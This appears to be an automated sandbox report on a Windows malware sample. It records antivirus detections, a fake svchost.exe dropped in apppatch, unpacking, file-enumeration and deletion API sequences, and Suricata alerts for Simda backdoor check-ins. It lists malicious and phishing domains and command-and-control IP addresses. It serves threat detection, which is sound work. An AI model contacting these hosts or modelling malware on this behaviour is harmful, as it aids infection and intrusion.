Source: http://pumydyg.com/login.phpAvira URL Cloud: Label: malware
Source: http://gatyruw.com/HAvira URL Cloud: Label: malware
Source: http://lymyjon.com/login.phpAvira URL Cloud: Label: malware
Source: http://volykit.com/login.phpAvira URL Cloud: Label: phishing
Source: http://lyryjej.com/login.phpAvira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Windows\apppatch\svchost.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
Multi AV Scanner detection for submitted file
Source: Z8eHwAvqAh.exeReversingLabs: Detection: 84%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
Machine Learning detection for dropped file
Source: C:\Windows\apppatch\svchost.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: Z8eHwAvqAh.exeJoe Sandbox ML: detected

Compliance

barindex
Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeUnpacked PE file: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1590000.2.unpack
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeUnpacked PE file: 31.2.swvGCAxOMikYQeoQzimiprVu.exe.1110000.2.unpack
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeUnpacked PE file: 1.2.Z8eHwAvqAh.exe.400000.0.unpack
Source: Z8eHwAvqAh.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 99.83.170.3:443 -> 192.168.2.10:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:49761 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:64056 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:64058 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:62050 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.10:62051 version: TLS 1.2
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: swvGCAxOMikYQeoQzimiprVu.exe, 0000000A.00000002.2167317620.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000B.00000000.2059290079.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000000D.00000000.2061299411.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000012.00000000.2065037016.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000016.00000000.2086064782.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000019.00000000.2093471617.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000001B.00000002.2109184378.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000001D.00000000.2106806222.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 0000001F.00000000.2111283138.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000021.00000002.2120935619.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000023.00000002.2130306173.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000025.00000002.2134588404.000000000056E000.00000002.00000001.01000000.00000009.sdmp, swvGCAxOMikYQeoQzimiprVu.exe, 00000027.00000002.2140976598.000000000056E000.00000002.00000001.01000000.00000009.sdmp
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012FD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,22_2_012FD120
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_01309910 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,22_2_01309910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_0130DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,22_2_0130DA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_0130DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,22_2_0130DAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012FE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,22_2_012FE6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012E7680 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,22_2_012E7680
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015B9910 GetHandleInformation,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,25_2_015B9910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015AD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,25_2_015AD120
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015BDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,25_2_015BDA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015BDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,25_2_015BDAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_01597680 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,25_2_01597680
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 25_2_015AE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,25_2_015AE6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AFD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,27_2_00AFD120
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B09910 PathAddBackslashA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,27_2_00B09910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B0DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,27_2_00B0DAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00B0DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,27_2_00B0DA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AFE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,27_2_00AFE6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 27_2_00AE7680 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,27_2_00AE7680
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012BD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,29_2_012BD120
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012C9910 Sleep,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,29_2_012C9910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012CDA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,29_2_012CDA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012CDAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,29_2_012CDAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012BE6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,29_2_012BE6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 29_2_012A7680 Sleep,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,29_2_012A7680
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01139910 Sleep,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,31_2_01139910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0112D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,31_2_0112D120
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0113DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,31_2_0113DA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0113DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,31_2_0113DAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_01117680 Sleep,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,31_2_01117680
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_0112E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,31_2_0112E6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0130D120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,33_2_0130D120
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01319910 OpenMutexA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,33_2_01319910
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0131DA50 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,33_2_0131DA50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0131DAE8 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,33_2_0131DAE8
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0130E6B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,33_2_0130E6B0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012F7680 OpenMutexA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,33_2_012F7680
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 22_2_012FD120 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,22_2_012FD120

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49736 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49724 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49737 -> 199.191.50.83:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49723 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49725 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49728 -> 99.83.170.3:80
Source: Network trafficSuricata IDS: 2021022 - Severity 1 - ET MALWARE Wapack Labs Sinkhole DNS Reply : 1.1.1.1:53 -> 192.168.2.10:64434
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49726 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49727 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49735 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49738 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49741 -> 154.212.231.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49734 -> 208.100.26.245:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49747 -> 178.162.203.202:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:64053 -> 18.208.156.248:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49974 -> 178.162.203.202:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:64055 -> 103.150.10.48:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:64059 -> 76.223.67.189:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:64052 -> 188.114.97.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:49994 -> 13.248.169.48:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:64062 -> 64.225.91.73:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:64063 -> 154.85.183.50:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:64054 -> 3.94.10.34:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:61300 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:62373 -> 64.225.91.73:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:64061 -> 103.224.182.252:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:64060 -> 103.224.212.210:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:57974 -> 52.34.198.229:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:61301 -> 72.52.179.174:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:64064 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:62047 -> 99.83.170.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:62042 -> 199.59.243.227:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:57481 -> 44.221.84.105:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:62052 -> 178.162.203.202:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:62046 -> 188.114.96.3:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:62044 -> 208.100.26.245:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:62045 -> 154.212.231.82:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:62043 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:62048 -> 23.253.46.64:80
Source: Network trafficSuricata IDS: 2804852 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin : 192.168.2.10:62041 -> 178.162.203.202:80
